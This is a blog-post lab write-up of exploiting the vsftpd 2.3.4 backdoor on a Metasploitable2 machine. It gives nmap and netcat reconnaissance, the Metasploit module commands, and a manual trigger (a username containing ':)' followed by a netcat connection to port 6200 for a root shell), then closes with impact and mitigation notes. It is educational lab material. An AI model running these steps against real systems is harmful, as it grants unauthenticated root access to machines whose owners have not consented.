DEV Community

Soumya Ranjan 🎖️
Soumya Ranjan 🎖️

Posted on

Metasploitable2 - FTP Exploitation using vsftpd 2.3.4 Backdoor

Metasploitable2 - FTP Exploitation using vsftpd 2.3.4 Backdoor

1. Objective

To identify and exploit a known vulnerability in an FTP service running on a vulnerable target machine using industry-standard reconnaissance and exploitation techniques.

2. Lab Environment

Component Description
Attacker Machine Kali Linux
Target Machine Metasploitable2
Network Type Host-only / NAT (same subnet)

3. Tools & Technologies Used

  • #Nmap – Network discovery and service enumeration
  • #Netcat – Banner grabbing and manual interaction
  • #Metasploit Framework – Exploitation
  • #Exploit_Database – Exploit reference

4. Methodology

Step 1: Identify Attacker Machine IP

ip a

  • Extract the IP address of the Kali machine (e.g., 192.168.1.159)

Step 2: Network Discovery


nmap -sn 192.168.1.0/24

  • Performs a ping scan to identify active hosts
  • Target identified: 192.168.1.160 → Metasploitable2

Step 3: Service Enumeration


nmap -sV 192.168.1.160

![[Pasted image 20260418144903.png]]

  • Detects running services and versions
  • Key finding: FTP → vsftpd 2.3.4

Step 4: Targeted Port Scan (FTP)


nmap -p 21 -sV 192.168.1.160

  • Confirms FTP service version

Step 5: #Banner_Grabbing (Manual Verification)

Using Netcat:


nc 192.168.1.160 21

![[Pasted image 20260418154605.png]]

  • Confirms: vsftpd 2.3.4

5. Vulnerability Identification

  • Software: vsftpd 2.3.4
  • Issue: Backdoor intentionally inserted in this version
  • Exploit Source: Exploit DB
  • Public exploit available:
    • Backdoor triggered via malicious username input

6. Exploitation using Metasploit

Step 1: Launch Framework


msfconsole

Step 2: Search for Exploit


search vsftpd

  • Relevant module: exploit/unix/ftp/vsftpd_234_backdoor ### Step 3: Load Exploit


use exploit/unix/ftp/vsftpd_234_backdoor

Step 4: Configure Target


set RHOST 192.168.1.160

Step 5: Configure listener

Shell
set LHOST <Your IP>

![[Pasted image 20260418152458.png]]

Step 5: Execute Exploit


run

Result

  • Remote shell access obtained
  • Privilege level: root

7. Manual Exploitation (Without Metasploit)

Step 1: Connect to FTP


ftp 192.168.1.160

Step 2: Trigger Backdoor

  • Username: test:)
  • Password: anything

Step 3: Connect to Backdoor Shell


nc 192.168.1.160 6200

Result

  • Direct root shell access established ## 8. Technical Explanation of the Vulnerability

The backdoor in vsftpd 2.3.4 operates as follows:

  • If the username contains :)
  • The service triggers a hidden function
  • Opens TCP port 6200
  • Provides unauthenticated root shell access

Attack Flow


Attacker → FTP Login (malicious username)
→ Backdoor Triggered
→ Port 6200 Opened
→ Root Shell Access

9. Impact Analysis

Factor Impact
Confidentiality Fully compromised
Integrity Fully compromised
Availability Potentially disrupted
Access Level Root
  • Classified as Critical (CVSS ~10.0)

10. Mitigation & Remediation

  • Upgrade FTP service to a secure version
  • Avoid using outdated software
  • Implement network segmentation
  • Use IDS/IPS to detect abnormal behavior
  • Disable unnecessary services

Top comments (0)